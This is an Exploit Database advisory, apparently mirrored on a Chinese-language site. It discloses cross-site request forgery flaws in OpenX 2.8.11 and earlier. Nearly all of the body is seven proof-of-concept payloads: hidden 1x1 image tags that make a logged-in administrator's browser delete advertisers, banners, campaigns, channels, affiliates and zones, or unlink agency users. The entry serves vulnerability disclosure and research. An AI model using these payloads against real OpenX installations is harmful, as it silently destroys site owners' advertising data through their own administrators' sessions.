OpenX 2.8.x – Multiple Cross-Site Request Forgery Vulnerabilities

• Exploit Database
• 144 阅读

• 作者： Mahmoud Ghorbanzadeh
  日期： 2014-03-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39117/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

  source: https://www.securityfocus.com/bid/66251/info   OpenX is prone to multiple cross-site request-forgery vulnerabilities.   Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.   OpenX 2.8.11 and prior versions are vulnerable.   File: admin/agency-user-unlink.php POC:   <img src=&apos;http://site/admin/agency-user-unlink.php?agencyid=1&userid=18&apos; width="1" height="1" border="0">   File: admin/advertiser-delete.php POC: <img src=&apos;http://site/admin/advertiser-delete.php?clientid=10&apos; width="1" height="1" border="0">   File: admin/banner-delete.php POC: <img src=&apos;http://site/admin/banner-delete.php?clientid=2&campaignid=7&bannerid=16&apos; width="1" height="1" border="0">   File: admin/campaign-delete.php POC: <img src=&apos;http://site/admin/campaign-delete.php?clientid=2&campaignid=11&apos; width="1" height="1" border="0">   File: admin/channel-delete.php POC: <img src=&apos;http://site/admin/channel-delete.php?affiliateid=1&channelid=6&apos; width="1" height="1" border="0">   File: admin/affiliate-delete.php POC: <img src=&apos;http://site/admin/affiliate-delete.php?affiliateid=9&apos; width="1" height="1" border="0">   File: admin/zone-delete.php POC: <img src=&apos;http://site/admin/zone-delete.php?affiliateid=1&zoneid=11&apos; width="1" height="1" border="0">